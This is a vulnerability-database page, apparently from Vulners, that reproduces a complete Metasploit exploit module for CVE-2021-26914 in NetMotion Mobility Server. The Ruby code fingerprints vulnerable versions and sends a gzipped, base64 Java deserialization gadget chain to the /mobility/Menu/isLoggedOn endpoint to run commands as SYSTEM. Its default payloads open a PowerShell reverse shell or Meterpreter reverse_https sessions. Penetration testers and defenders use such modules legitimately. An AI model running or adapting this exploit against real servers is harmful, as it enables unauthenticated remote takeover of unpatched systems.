Vulners
Lucene search
NetMotion Mobility Server MvcUtil Java Deserialization Exploit
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2021-26914 | 9 Feb 202100:39 | – | circl |
 | NetMotion Mobility 代码问题漏洞 | 8 Feb 202100:00 | – | cnnvd |
 | NetMotion Mobility Remote Code Execution Vulnerability | 9 Feb 202100:00 | – | cnvd |
 | CVE-2021-26914 | 8 Feb 202121:04 | – | cve |
 | CVE-2021-26914 | 8 Feb 202121:04 | – | cvelist |
 | NetMotion Mobility Server MvcUtil Java Deserialization | 18 May 202117:42 | – | metasploit |
 | CVE-2021-26914 | 8 Feb 202122:15 | – | nvd |
 | CVE-2021-26914 | 8 Feb 202122:15 | – | osv |
 | NetMotion Mobility Server MvcUtil Java Deserialization | 18 May 202100:00 | – | packetstorm |
 | Deserialization of untrusted data | 8 Feb 202122:15 | – | prion |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::JavaDeserialization
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization',
'Description' => %q{
This module exploits an unauthenticated Java deserialization in the
NetMotion Mobility server's MvcUtil.valueStringToObject() method, as
invoked through the /mobility/Menu/isLoggedOn endpoint, to execute
code as the SYSTEM account.
Mobility server versions 11.x before 11.73 and 12.x before 12.02 are
vulnerable. Tested against 12.01.09045 on Windows Server 2016.
},
'Author' => [
'mr_me', # Discovery and PoC
'wvu' # Module
],
'References' => [
['CVE', '2021-26914'],
['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'],
['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'],
['URL', 'https://srcincite.io/advisories/src-2021-0007/']
],
'DisclosureDate' => '2021-02-08', # Public disclosure
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Command',
{
'Arch' => ARCH_CMD,
'Type' => :cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
}
],
[
'Dropper',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :dropper,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
}
}
],
[
'PowerShell',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
}
}
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS, # C:\Program Files\NetMotion Server\logs
ARTIFACTS_ON_DISK # CmdStager
]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
unless (version = parse_version(res))
return CheckCode::Unknown('Failed to parse version from response.')
end
unless vuln_version?(version)
return CheckCode::Safe("NetMotion Mobility #{version} is patched.")
end
CheckCode::Appears("NetMotion Mobility #{version} is unpatched.")
end
def parse_version(res)
return unless res&.code == 200
# <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'>
res.get_html_document.at('//img[@alt = "Mobility"]/@src').to_s[
%r{^/images/menu_logo\.png\?version=(?<version>[\d.]+)$},
:version # Hat tip @adfoster-r7
]
end
def vuln_version?(version)
@vuln_versions ||=
(11.0...11.73).step(0.01) + # 11.0 through 11.72
(12.0...12.02).step(0.01) # 12.0 through 12.01
@vuln_versions.include?(version.to_f)
end
def exploit
print_status("Executing #{payload_instance.refname} (#{target.name})")
case target['Type']
when :cmd
execute_command(payload.encoded)
when :dropper
execute_cmdstager
when :psh
execute_command(
cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
)
)
end
end
def execute_command(cmd, _opts = {})
# XXX: %Path% is otherwise *only* C:\Program Files\NetMotion Server
cmd.prepend(
'set Path=%Path%;' \
'C:\Windows\System32' \
';' \
'C:\Windows\System32\WindowsPowerShell\v1.0' \
'&&'
)
print_status('Triggering deserialization')
vprint_status("Executing command: #{cmd}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'),
'vars_post' => {
'Mvc_x_Form_x_Name' => go_go_gadget(cmd)
}
)
unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing
fail_with(Failure::PayloadFailed, 'Failed to trigger deserialization')
end
print_good('Successfully triggered deserialization')
end
def go_go_gadget(cmd)
Rex::Text.encode_base64(
Rex::Text.gzip(
generate_java_deserialization_for_command(
'CommonsCollections6',
'cmd', # cmd.exe
cmd
)
)
)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 May 2021 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 29.3
CVSS 3.18.1
EPSS0.64438